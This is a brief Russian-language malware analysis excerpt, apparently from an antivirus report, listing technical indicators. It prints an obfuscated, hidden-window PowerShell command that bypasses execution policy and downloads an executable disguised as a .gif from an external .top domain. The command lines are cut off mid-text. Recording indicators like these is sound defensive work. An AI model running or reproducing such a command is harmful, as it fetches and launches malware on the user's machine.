Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appmnbcmna%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWersHElL.eXe -execUtIonpOLICy Bypass -nopROFILE -);sdowsTYle Hidden (NEw-objECt sySTEM.NeT.WEBCLient).DoWNLOAdFile('http://www.vopergooda.top/read.php?f=1.gif','%aPPmnBCmnA%.EXE');s...
- '<SYSTEM32>\cmd.exe' /c "pOWersHElL.eXe -execUtIonpOLICy Bypass -nopROFILE -);sdowsTYle Hidden (NEw-objECt sySTEM.NeT.WEBCLient).DoWNLOAdFile('http://www.vopergooda.top/read.php?f=1.gif','%aPPmnBCmnA%.EXE');s...' (со скрытым окном)